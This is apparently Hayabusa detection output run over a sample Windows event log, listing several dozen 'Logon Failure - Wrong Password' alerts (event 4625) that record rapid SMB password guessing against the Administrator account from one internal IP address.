2016-09-20 01:51:15.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PKYNy0JyxIlFusMC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.298 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IrcKp13ut9M0pCi0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B3lJSH0r8iHAVhPF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ju3lCbvbwvkIKsBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.435 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dQOHcZeAKQG6wHhC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.474 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QBPkgoKDLABqdSQb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wqj4xOCsJg1j3IIh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.561 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XhBIu6wUPHc3DZAy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W0fI1GhH5YTOHbNN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7mLOWiojillZNYH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.702 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 37dknpwsl8j1WRWi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gzVum7a21sQe3fMt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JCFPSQmywelTXg74 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jCqb6TVV14hVX3NY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3qJsJrxVARedOdd3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s7iNkrkBNEbXPK0B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.975 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bio4zciNRolyeHc1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.026 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IFf1vN5MgAIsdZvx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.072 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zWhgUQSWAycVdYoS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ugHUJZuKHYfUHXWS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AUeUmYa72BzHfyhK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ksydur7W1mUoOZAE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YNIzopnsXH6OjcUs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SQljJkaWs8bcaOI1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1jejn6ZMo564m7ok | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KrpBO1SCHpt27CRM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ifPePsozBYRLCU3k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vve4r8QwaMLKrrcX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i9ArElR5k8yLefWu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4a1Y126C516BaGcz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VL7PnrO2dLsEbebQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GGTlLZ8J9f2PtiuL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6sVwPFs7bhJgJwRt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dgQNHL9etdHdRw9Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mjZrWpJlN2CwbxFc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 72lmrp6neWGKAURB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CnTi5dgoWunYutJ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vi2fTl07llsJEYyt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hohh8KS1eYtojEya | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.020 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RsuC8F95UmsOSKvs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: be8UJ0EN7XS5r0b6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CgJlVYanwWKAhJ7O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zthqCIkr1nKtqcCj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tzmi8I402j71q5Wg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m0U3NYl8QEbgeJry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uJJ1FOUIBInGkKPQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bu0X5RisszAHEs0X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.370 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ZZfs8zqT2bLOAHq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qkpO31LzJfaYLyjB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.461 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BJrIsRTWUwPuySR7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.503 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VHNccqtwl9Y9IhLq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: APlvDcMzvms0gehT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AxOERGKI75RarVNZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uvzwd5qqC7og49yW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.662 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lksm3o2g0YhFnm4Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zwXhSPCV4qHVF9Rc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z31baZ4G36idFMeX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WK63qylKunHZB3zS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ALJxKGwyZz7JDpRg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q8tioTO3TEIzdzY0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5dIKTgQkvPKzKJoZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ta0IMrlArbgONhDG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MKNUu4624Rvr87kK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n7jIL2FkXzWqvWTJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oJMVh1zdQt7EikVj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.113 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5OqvximSAPlXZ3An | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tr2GQ1F3jccpWrsm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CCmbvQXXXzhHOdMG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qTp1BwPv8XiK2mrG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rnb19AXxM5ArcLxX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EUS5CKq2W1rkq46d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FzKSUVdsC5eENWDd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QFL07Mhy4iw5psBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cMpitnzLXDLSXL73 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
